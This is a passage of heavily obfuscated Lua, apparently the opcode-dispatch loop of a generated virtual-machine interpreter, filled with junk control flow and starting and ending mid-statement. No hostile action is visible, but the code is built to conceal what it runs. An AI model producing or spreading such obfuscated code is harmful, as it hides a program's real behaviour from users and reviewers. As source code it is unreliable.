n[e]=nil;end;e=e[o];e=e[o];elseif(f<12)then e=e[o];n[e[l]]=s[e[x]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]][e[x]]=n[e[a]];e=e[o];e=e[o];end;elseif(f>r(c(932794478,521715173),c(781459594,781026331)))then local d=e[l];local c=n[e[x]];n[d+1]=c;n[d]=c[e[a]];e=e[o];local r;local f;local s;local c=0;local function d(e,n,l)e=(c+e)%3 c=((e~=0)and c+((1==e)and-n or n)or c*n)%l return c end for o=0,34 do if d(3165,9165+o,600)<=300 then if d(3191,4785+o,2796)>1398 then r=l;if d(3488,1554+o,2824)>1412 then n[s]=f;else f=e[x];end else if d(5020,4693+o,2814)<1407 then else end end s=e[r];else if d(2214,5065+o,3802)<1901 then if d(1603,3047+o,1456)>=728 then else end else if d(3133,8502+o,1968)>984 then else end end end end n[e[l]]=e[x];e=e[o];local d=e[l];n[d]=n[d](i(n,d+1,e[x]));for e=d+1,t do n[e]=nil;end;e=e[o];local d=e[l];local c=n[e[x]];n[d+1]=c;n[d]=c[e[a]];e=e[o];n[e[l]]=e[x];e=e[o];local d=e[l];n[d](i(n,d+1,e[x]));for e=d+1,t do n[e]=nil;end;e=e[o];local c=e[l];local d=n[e[x]];n[c+1]=d;n[c]=d[e[a]];e=e[o];local d=e[l];n[d](n[1+d]);for e=d,t do n[e]=nil;end;e=e[o];local d=e[l];local c=n[e[x]];n[d+1]=c;n[d]=c[e[a]];e=e[o];n[e[l]]=e[x];e=e[o];local c;local t;local f;local a=0;local function d(e,n,l)e=(a+e)%3 a=((e~=0)and a+((e<2)and-n or n)or a*n)%l return a end for o=0,27 do if d(2651,7685+o,2690)<=1345 then if d(6300,2034+o,1304)<=652 then if d(5603,1945+o,3450)<=1725 then n[f]=t;else end else if d(3013,4003+o,1924)<962 then else end end else c=l;if d(4652,9671+o,862)<431 then if d(7951,4393+o,1014)<=507 then t=e[x];else end f=e[c];else if d(5704,9483+o,2944)<1472 then else end end end end e=e[o];elseif(f<14)then e=e[o];n[e[l]]=s[e[x]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=s[e[x]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];local s;local r;local f;local c=0;local function d(n,e,l)e=(c+e)%3 c=((e~=0)and c+((1==e)and n or-n)or c*n)%l return c end for o=2,33 do if d(8250,2003+o,1288)<=644 then if d(3746,8025+o,3938)<=1969 then if d(4617,3987+o,778)>=389 then s=l;else end r=e[x];else if d(3622,8613+o,300)<150 then else end end else if d(5788,9881+o,3358)<1679 then if d(9384,7752+o,1038)>=519 then else f=e[s];end n[f]=r;else if d(9843,5117+o,2520)<=1260 then else end end end end n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local r;local f;local s;local c=0;local function d(n,e,l)e=(c+e)%3 c=((e~=0)and c+((1==e)and n or-n)or c*n)%l return c end for o=2,33 do if d(4333,5497+o,3556)<=1778 then if d(7320,8882+o,2698)<1349 then if d(6210,4280+o,1140)<570 then else n[e[l]]=n[e[x]]+e[a];end else if d(4087,6971+o,1884)>942 then r=l;else end end f=e[x];else if d(8295,4709+o,2260)<=1130 then s=e[r];if d(2060,4735+o,1742)>=871 then n[s]=f;else end else if d(3465,5540+o,622)<=311 then else end end end end n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local d=e[l];n[d]=n[d](i(n,d+1,e[x]));for e=d+1,t do n[e]=nil;end;e=e[o];n[e[l]][e[x]]=n[e[a]];e=e[o];n[e[l]]=A[e[x]];e=e[o];local c=e[l];local d=n[e[x]];n[c+1]=d;n[c]=d[e[a]];e=e[o];n[e[l]]=e[x];e=e[o];local r;local f;local c;local a=0;local function d(n,e,l)e=(a+e)%3 a=((e~=0)and a+((e<2)and-n or n)or a*n)%l return a end for o=0,28 do if d(4198,2498+o,2730)>1365 then if d(8319,4436+o,3924)>=1962 then if d(6756,7906+o,1322)>661 then else end else if d(1471,2650+o,2922)>=1461 then r=l;else end f=e[x];end else if d(4033,4748+o,2314)<1157 then if d(7725,4805+o,1392)<=696 then else end else if d(1966,4260+o,3788)<1894 then else c=e[r];end end n[c]=f;end end local l=e[l];n[l](i(n,l+1,e[x]));for e=l+1,t do n[e]=nil;end;e=e[o];e=e[o];end;elseif(f<=r(548737277,486816))then if(f<=r(c(994271752,d[273720328]),c(655579718,d[814652122])))then if(f<=((h[324639603])or((function(e)h[324639603]=c(c((e)-947324,940645),597798);return(h[324639603]);end)(c(70883790,70000646)))))then n[e[l]]=n[e[x]][e[a]];elseif(f==r(c(11375974,392181584),c(103238746,104382382)))then e=e[o];n[e[l]]=s[e[x]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=s[e[x]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local f;local r;local s;local c=0;local function d(e,n,l)e=(c+e)%3 c=((e~=0)and c+((e<2)and n or-n)or c*n)%l return c end for o=2,31 do if d(5132,3724+o,3080)<=1540 then if d(3540,3360+o,2430)<=1215 then if d(4298,5732+o,2602)<1301 then local o=e[x];local x=n[o];for e=o+1,e[a]do x=x..n[e];end;n[e[l]]=x;else end else if d(7678,5649+o,1850)>=925 then else end end else f=l;if d(2432,1545+o,1946)>=973 then if d(1840,5347+o,1866)<=933 then r=e[x];else s=e[f];end else n[s]=r;if d(5476,6013+o,2638)<1319 then else end end end end n[e[l]]=e[x];e=e[o];local f;local s;local r;local c=0;local function d(e,n,l)e=(c+e)%3 c=((e~=0)and c+((1==e)and n or-n)or c*n)%l return c end for o=0,27 do if d(8073,2951+o,3154)>1577 then r=e[f];if d(8776,7794+o,2900)>1450 then if d(8662,7690+o,484)<=242 then n[e[l]]=n[e[x]]+e[a];else end else if d(1171,2189+o,882)<441 then else n[r]=s;end end else if d(6524,1640+o,3348)>=1674 then f=l;if d(8862,3569+o,1790)>=895 then s=e[x];else end else if d(4126,9199+o,1814)<907 then else end end end end n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local s;local r;local f;local c=0;local function d(e,n,l)e=(c+e)%3 c=((e~=0)and c+((e<2)and-n or n)or c*n)%l return c end for o=2,25 do if d(7787,9683+o,1954)<977 then f=e[s];if d(3328,2845+o,3334)<=1667 then if d(2025,7723+o,604)>302 then else end else if d(1060,6506+o,3592)<1796 then n[f]=r;else end end else if d(2292,9398+o,882)<=441 then if d(8504,1962+o,2848)<=1424 then u=e[x];else s=l;end else if d(1234,8910+o,1948)<974 then else end end r=e[x];end end n[e[l]]=e[x];e=e[o];local d=e[l];n[d]=n[d](i(n,d+1,e[x]));for e=d+1,t do n[e]=nil;end;e=e[o];n[e[l]][e[x]]=n[e[a]];e=e[o];n[e[l]]=A[e[x]];e=e[o];local d=e[l];local c=n[e[x]];n[d+1]=c;n[d]=c[e[a]];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local l=e[l];n[l](i(n,l+1,e[x]));for e=l+1,t do n[e]=nil;end;e=e[o];e=e[o];elseif(f<=r(c(263704494,570714157),1093057))then local l=e[l];local x,e=y(n[l](i(n,l+1,e[x])));b=e+l-1;local e=0;for l=l,b do e=e+1;n[l]=x[e];end;end;elseif(f<=r(c(808456583,d[114931249]),884016))then if(f>c(376555082,376555096))then local o=e[x];local x=n[o];for e=o+1,e[a]do x=x..n[e];end;n[e[l]]=x;elseif(f<((h[471731811])or((function(e)h[471731811]=(c(c(e,99296),392895))-41438;return(h[471731811]);end)(c(298205037,297984963)))))then n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local t;local f;local i;local c=0;local function d(e,n,l)e=(c+e)%3 c=((e~=0)and c+((1==e)and n or-n)or c*n)%l return c end for o=1,26 do if d(2984,7267+o,416)>208 then t=l;if d(8268,5095+o,908)>454 then if d(8545,5544+o,2458)>=1229 then f=e[x];else end else if d(8375,4153+o,2106)<=1053 then else local o=e[x];local x=n[o];for e=o+1,e[a]do x=x..n[e];end;n[e[l]]=x;end end else if d(8015,9182+o,1066)>533 then if d(7181,9415+o,1574)<=787 then else i=e[t];end else if d(8961,9914+o,3102)<1551 then n[i]=f;else end end end end n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];e=e[o];end;elseif(f==c(106951584,d[998158507]))then local f;local t;local c;local d=0;local function o(n,e,l)e=(d+e)%3 d=((e~=0)and d+((e<2)and n or-n)or d*n)%l return d end for d=2,31 do if o(5146,4909+d,1554)>=777 then if o(3501,7255+d,384)<=192 then if o(6577,5350+d,3722)>1861 then else end else n[c]=t;if o(8372,9068+d,478)<239 then else end end else if o(1089,7512+d,3490)>1745 then f=l;if o(1372,6245+d,2232)>1116 then else t=e[x];end else if o(9740,8935+d,1450)<725 then else local o=e[x];local x=n[o];for e=o+1,e[a]do x=x..n[e];end;n[e[l]]=x;end end c=e[f];end end elseif(f<=r(864561623,2576196))then n[e[l]]=w(e[x]);end;elseif(f<=((h[191498389])or((function(e)h[191498389]=c(((c((e)-47265,350869))-51023)-850920,812336);return(h[191498389]);end)(c(748637054,d[841330815])))))then if(f<=r(766748547,1093059))then if(f>c(507555539,507555525))then n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local i;local f;local t;local c=0;local function d(n,e,l)e=(c+e)%3 c=((e~=0)and c+((e<2)and n or-n)or c*n)%l return c end for o=0,30 do if d(5027,1324+o,3644)>1822 then if d(9067,2272+o,3640)>1820 then n[e[l]]=e[x]-e[a];if d(7821,9302+o,3066)<=1533 then local o=e[x];local x=n[o];for e=o+1,e[a]do x=x..n[e];end;n[e[l]]=x;else if(e[l]~=e[a])then u=u+1;else u=e[x];end;end else if d(8806,7486+o,2854)>=1427 then n[t]=f;else f=e[x];end t=e[i];end else if d(2507,2421+o,804)<=402 then if d(5224,1449+o,1052)<=526 then else i=l;end else if d(9316,8045+o,1314)>657 then n[e[l]]=n[e[x]];else n[e[l]]=s[e[x]];end end end end n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local i;local t;local f;local c=0;local function d(n,e,l)e=(c+e)%3 c=((e~=0)and c+((e<2)and n or-n)or c*n)%l return c end for o=2,33 do if d(5638,1408+o,242)>=121 then if d(6885,9052+o,1240)>=620 then if d(8224,8284+o,882)<441 then else t=e[x];end else if d(8388,4972+o,2684)<1342 then else end end else if d(1715,4151+o,2190)>1095 then if d(6364,4460+o,2290)<=1145 then i=l;else u=e[x];end else if d(1327,8663+o,1140)>=570 then f=e[i];else n[f]=t;end end end end n[e[l]]=e[x];e=e[o];local f;local t;local i;local c=0;local function d(n,e,l)e=(c+e)%3 c=((e~=0)and c+((e<2)and n or-n)or c*n)%l return c end for o=2,27 do if d(5804,1429+o,2212)<1106 then if d(8833,1245+o,1078)<539 then if d(8732,2905+o,2030)>1015 then else n[i]=t;end else if d(1435,8345+o,3166)>=1583 then f=l;else if(n[e[l]]==e[a])then u=u+1;else u=e[x];end;end end else if d(2539,4107+o,3662)<1831 then if d(4390,5861+o,2964)<1482 then n[e[l]]=n[e[x]];else t=e[x];end else if d(7053,9997+o,960)>480 then else end end i=e[f];end end n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];e=e[o];elseif(f<23)then local d=e[l];local c=n[e[x]];n[d+1]=c;n[d]=c[e[a]];e=e[o];local d=e[l];n[d](n[1+d]);for e=d,t do n[e]=nil;end;e=e[o];local d=e[l];local c=n[e[x]];n[d+1]=c;n[d]=c[e[a]];e=e[o];n[e[l]]=e[x];e=e[o];local d=e[l];n[d](i(n,d+1,e[x]));for e=d+1,t do n[e]=nil;end;e=e[o];local d=e[l];local c=n[e[x]];n[d+1]=c;n[d]=c[e[a]];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];e=e[o];end;elseif(f==r(c(444294249,d[943807356]),1008730))then elseif(f<=r(c(961742356,d[943807356]),c(657188493,d[814652122])))then local l=e[l];n[l]=0+(n[l]);n[l+1]=0+(n[l+1]);n[l+2]=0+(n[l+2]);local o=n[l];local d=n[l+2];if(d>0)then if(o>n[l+1])then u=e[x];else n[l+3]=o;end;elseif(o<n[l+1])then u=e[x];else n[l+3]=o;end;end;elseif(f<=((h[81428921])or(d[793463602](c(575501557,d[250892586]),c,h,81428921))))then if(f>r(c(375559723,d[273720328]),884007))then local e=e[l];n[e]=n[e](n[e+1]);for e=e+1,t do n[e]=nil;end;elseif(f<27)then e=e[o];n[e[l]]=s[e[x]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=s[e[x]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local d=e[l];n[d]=n[d](i(n,d+1,e[x]));for e=d+1,t do n[e]=nil;end;e=e[o];n[e[l]][e[x]]=n[e[a]];e=e[o];n[e[l]]=A[e[x]];e=e[o];local d=e[l];local c=n[e[x]];n[d+1]=c;n[d]=c[e[a]];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local l=e[l];n[l](i(n,l+1,e[x]));for e=l+1,t do n[e]=nil;end;e=e[o];e=e[o];end;elseif(f>r(c(865725949,d[81883734]),c(757718456,d.r4x0mp)))then e=e[o];local x=e[l];b=x+E-1;for e=0,E do n[x+e]=B[e];end;for e=b+1,t do n[e]=nil;end;e=e[o];local l=e[l];do return i(n,l,b);end;e=e[o];e=e[o];elseif(f<((h[938214316])or(d[749996492](c(746628286,d[273720328]),c,h,938214316))))then n[e[l]]=n[e[x]][n[e[a]]];end;elseif(f<=c(872859823,d.MXxT5eJPl))then if(f<=r(c(530733858,822170706),c(108702643,d[998158507])))then if(f<=r(988567061,883905))then if(f<=((h[324057700])or((function(e)h[324057700]=((c(c(c(e,308118),932485),815367))-684479)-289009;return(h[324057700]);end)(c(345175430,345691996)))))then e=e[o];n[e[l]]=s[e[x]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=s[e[x]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local d=e[l];n[d]=n[d](i(n,d+1,e[x]));for e=d+1,t do n[e]=nil;end;e=e[o];n[e[l]][e[x]]=n[e[a]];e=e[o];n[e[l]]=s[e[x]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=s[e[x]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local d=e[l];n[d]=n[d](i(n,d+1,e[x]));for e=d+1,t do n[e]=nil;end;e=e[o];n[e[l]][e[x]]=n[e[a]];e=e[o];local f;local h;local u;local r;local b;local c=0;local function d(n,e,l)e=(c+e)%3 c=((e~=0)and c+((1==e)and n or-n)or c*n)%l return c end for o=2,29 do if d(6372,1881+o,2354)<1177 then if d(2430,5817+o,3878)<=1939 then if d(5008,2331+o,1032)>=516 then else n[e[l]]=s[e[x]];end else if d(5563,1552+o,2972)<1486 then u=e[x];else f=s;end h=l;end else if d(7697,2797+o,3754)<=1877 then r=f[u];if d(9444,7697+o,3644)<=1822 then n[e[l]]=n[e[x]]+e[a];else b=e[h];end else if d(2981,3871+o,586)<=293 then else n[b]=r;end end end end n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=s[e[x]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local d=e[l];n[d]=n[d](i(n,d+1,e[x]));for e=d+1,t do n[e]=nil;end;e=e[o];n[e[l]][e[x]]=n[e[a]];e=e[o];n[e[l]]=s[e[x]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];e=e[o];elseif(f>r(c(740771775,42223823),c(285073930,d[140359578])))then local c=e[l];local d=n[e[x]];n[c+1]=d;n[c]=d[e[a]];e=e[o];local d=e[l];n[d](n[1+d]);for e=d,t do n[e]=nil;end;e=e[o];local d=e[l];local c=n[e[x]];n[d+1]=c;n[d]=c[e[a]];e=e[o];n[e[l]]=e[x];e=e[o];local d=e[l];n[d](i(n,d+1,e[x]));for e=d+1,t do n[e]=nil;end;e=e[o];local c=e[l];local d=n[e[x]];n[c+1]=d;n[c]=d[e[a]];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];e=e[o];elseif(f<r(c(431320832,d['MXxT5eJPl']),1092914))then n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local t;local f;local c;local a=0;local function d(n,e,l)e=(a+e)%3 a=((e~=0)and a+((1==e)and-n or n)or a*n)%l return a end for o=2,32 do if d(4139,8622+o,562)<=281 then if d(4426,5064+o,1236)<=618 then if d(6386,7130+o,2390)>=1195 then t=l;else n[e[l]]=s[e[x]];end else if d(9406,5189+o,788)<=394 then else end end f=e[x];else if d(5831,5495+o,416)<208 then n[c]=f;if d(3068,5097+o,528)>264 then else end else if d(7327,4443+o,1168)<584 then c=e[t];else end end end end n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];e=e[o];end;elseif(f<=((h[369453057])or(d[212276199](c(748081918,d[273720328]),c,h,369453057))))then if(f==r(c(683721029,91449030),1092913))then local d=e[l];local c=n[e[x]];n[d+1]=c;n[d]=c[e[a]];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local d=e[l];n[d]=n[d](i(n,d+1,e[x]));for e=d+1,t do n[e]=nil;end;e=e[o];local c=e[l];local d=n[e[x]];n[c+1]=d;n[c]=d[e[a]];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local d=e[l];n[d]=n[d](i(n,d+1,e[x]));for e=d+1,t do n[e]=nil;end;e=e[o];local c=e[l];local d=n[e[x]];n[c+1]=d;n[c]=d[e[a]];e=e[o];n[e[l]]=e[x];e=e[o];local d=e[l];n[d](i(n,d+1,e[x]));for e=d+1,t do n[e]=nil;end;e=e[o];local d=e[l];local c=n[e[x]];n[d+1]=c;n[d]=c[e[a]];e=e[o];local d=e[l];n[d](n[1+d]);for e=d,t do n[e]=nil;end;e=e[o];local c=e[l];local d=n[e[x]];n[c+1]=d;n[c]=d[e[a]];e=e[o];local s;local r;local f;local c=0;local function d(n,e,l)e=(c+e)%3 c=((e~=0)and c+((e<2)and n or-n)or c*n)%l return c end for o=0,30 do if d(2453,3903+o,2402)<1201 then if d(6369,5334+o,3990)<=1995 then if d(8621,6069+o,2068)<=1034 then s=l;else end r=e[x];else if d(6707,3254+o,3456)>1728 then n[f]=r;else end end f=e[s];else if d(9153,4581+o,2218)<=1109 then if d(7087,1905+o,3804)>=1902 then else end else if d(3186,9847+o,3742)<=1871 then else n[e[l]]=n[e[x]];end end end end n[e[l]]=e[x];e=e[o];local d=e[l];n[d]=n[d](i(n,d+1,e[x]));for e=d+1,t do n[e]=nil;end;e=e[o];local d=e[l];local c=n[e[x]];n[d+1]=c;n[d]=c[e[a]];e=e[o];local r;local s;local f;local c=0;local function d(e,n,l)e=(c+e)%3 c=((e~=0)and c+((1==e)and-n or n)or c*n)%l return c end for o=2,31 do if d(3823,5417+o,2360)>=1180 then if d(9729,5958+o,1950)<=975 then if d(7075,6461+o,2096)<=1048 then else end else if d(3988,6687+o,1476)>=738 then r=l;else n[f]=s;end s=e[x];end else if d(7900,2290+o,3632)<1816 then if d(9817,4420+o,616)>308 then else end else if d(3827,5406+o,1876)>938 then f=e[r];else end end end end n[e[l]]=e[x];e=e[o];local d=e[l];n[d]=n[d](i(n,d+1,e[x]));for e=d+1,t do n[e]=nil;end;e=e[o];local c=e[l];local d=n[e[x]];n[c+1]=d;n[c]=d[e[a]];e=e[o];n[e[l]]=e[x];e=e[o];local d=e[l];n[d](i(n,d+1,e[x]));for e=d+1,t do n[e]=nil;end;e=e[o];local d=e[l];local c=n[e[x]];n[d+1]=c;n[d]=c[e[a]];e=e[o];local d=e[l];n[d](n[1+d]);for e=d,t do n[e]=nil;end;e=e[o];local d=e[l];local c=n[e[x]];n[d+1]=c;n[d]=c[e[a]];e=e[o];local c;local t;local f;local a=0;local function d(e,n,l)e=(a+e)%3 a=((e~=0)and a+((1==e)and n or-n)or a*n)%l return a end for o=1,28 do if d(2535,5929+o,2404)>1202 then if d(9269,3595+o,576)<=288 then if d(1646,9677+o,1524)>762 then else end else n[f]=t;if d(5416,9852+o,936)<=468 then else end end else c=l;if d(2141,6074+o,476)>=238 then if d(6571,9924+o,2432)>=1216 then else end else t=e[x];if d(3602,7866+o,3596)>=1798 then else f=e[c];end end end end n[e[l]]=e[x];e=e[o];e=e[o];elseif(f<=((h[951619467])or(d[984576513](c(591106343,d[81883734]),c,h,951619467))))then n[e[l]][e[x]]=n[e[a]];end;elseif(f>35)then local f;local t;local i;local c=0;local function d(e,n,l)e=(c+e)%3 c=((e~=0)and c+((1==e)and n or-n)or c*n)%l return c end for o=2,26 do if d(1411,4289+o,442)>=221 then if d(8146,6091+o,1362)>=681 then if d(1439,5429+o,1750)<875 then else f=l;end else if d(7737,3287+o,1292)<646 then local o=e[x];local x=n[o];for e=o+1,e[a]do x=x..n[e];end;n[e[l]]=x;else n[i]=t;end end else t=e[x];if d(8519,1505+o,2702)>1351 then if d(5070,1846+o,3588)<=1794 then n[e[l]]=n[e[x]];else end else if d(4031,2469+o,2206)>1103 then i=e[f];else n[e[l]]=n[e[x]]+e[a];end end end end n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local f;local t;local i;local c=0;local function d(n,e,l)e=(c+e)%3 c=((e~=0)and c+((e<2)and-n or n)or c*n)%l return c end for o=1,33 do if d(4263,8170+o,2976)<1488 then f=l;if d(4490,6119+o,642)>321 then if d(1805,1592+o,2836)>=1418 then t=e[x];else end else if d(3813,3870+o,402)<=201 then i=e[f];else end end else if d(9570,6374+o,2746)>1373 then if d(6158,9504+o,1184)<=592 then else end else if d(1391,4590+o,2978)<=1489 then else n[i]=t;end end end end local f;local t;local i;local c=0;local function d(n,e,l)e=(c+e)%3 c=((e~=0)and c+((1==e)and-n or n)or c*n)%l return c end for o=2,33 do if d(2188,3813+o,256)<=128 then if d(4473,7954+o,348)>=174 then if d(8747,1019+o,3814)>1907 then else if(n[e[l]]==e[a])then u=u+1;else u=e[x];end;end else i=e[f];if d(9937,7943+o,1850)<=925 then n[i]=t;else end end else if d(7865,3051+o,246)>123 then if d(7725,1978+o,2204)>1102 then t=e[x];else f=l;end else if d(4781,6284+o,1790)<=895 then else end end end end n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local i;local f;local t;local c=0;local function d(e,n,l)e=(c+e)%3 c=((e~=0)and c+((1==e)and-n or n)or c*n)%l return c end for o=0,28 do if d(3306,8534+o,1522)<=761 then if d(1025,9906+o,228)<114 then i=l;if d(6825,1635+o,3476)<=1738 then n[e[l]]=n[e[x]];else f=e[x];end else if d(7415,6490+o,3370)<1685 then else end end else if d(5724,7474+o,3014)>=1507 then if d(4203,3390+o,1328)>664 then t=e[i];else end n[t]=f;else if d(8282,5844+o,2408)>=1204 then else n[e[l]]=e[x]-e[a];end end end end local i;local f;local t;local c=0;local function d(n,e,l)e=(c+e)%3 c=((e~=0)and c+((1==e)and n or-n)or c*n)%l return c end for o=0,30 do if d(9075,8805+o,3838)>=1919 then n[t]=f;if d(2655,1675+o,274)>137 then if d(8038,4557+o,2686)>1343 then else end else if d(4961,5063+o,292)>146 then else end end else if d(2341,8724+o,3036)>1518 then if d(8188,2217+o,3924)>=1962 then else n[e[l]]=n[e[x]]+e[a];end else i=l;if d(9450,1129+o,2914)<=1457 then f=e[x];else end end t=e[i];end end n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];e=e[o];elseif(f<r(864561623,2574835))then n[e[l]]=n[e[x]];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=s[e[x]];e=e[o];n[e[l]]=s[e[x]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=#n[e[x]];e=e[o];local d=e[l];n[d]=n[d](i(n,d+1,e[x]));for e=d+1,t do n[e]=nil;end;e=e[o];n[e[l]]=n[e[x]][n[e[a]]];e=e[o];local d=e[l];n[d]=n[d](n[d+1]);for e=d+1,t do n[e]=nil;end;e=e[o];n[e[l]]=e[x];e=e[o];local c=e[x];local d=n[c];for e=c+1,e[a]do d=d..n[e];end;n[e[l]]=d;e=e[o];local l=e[l];n[l](i(n,l+1,e[x]));for e=l+1,t do n[e]=nil;end;e=e[o];e=e[o];end;elseif(f<=r(c(461002102,198844124),c(574528428,573702118)))then if(f<=r(c(408783834,93758381),c(256067370,d[203450867])))then if(f==r(782438256,2447368))then n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local f;local t;local i;local c=0;local function d(n,e,l)e=(c+e)%3 c=((e~=0)and c+((1==e)and n or-n)or c*n)%l return c end for o=2,30 do if d(7697,6825+o,3440)>1720 then if d(3643,3740+o,218)>109 then if d(8870,6555+o,2926)<1463 then else end else f=l;if d(2684,5291+o,1284)>=642 then t=e[x];else n[i]=t;end end else if d(4847,8013+o,3102)<1551 then if d(3395,5006+o,350)>175 then else n[e[l]]=n[e[x]];end else if d(8337,6755+o,454)<=227 then i=e[f];else end end end end n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local i;local f;local t;local c=0;local function d(n,e,l)e=(c+e)%3 c=((e~=0)and c+((1==e)and n or-n)or c*n)%l return c end for o=1,27 do if d(8048,7998+o,3844)<1922 then if d(3505,7865+o,2358)>=1179 then if d(8378,6252+o,2484)<1242 then else end else if d(9452,8162+o,3086)>=1543 then i=l;else t=e[i];end f=e[x];end else if 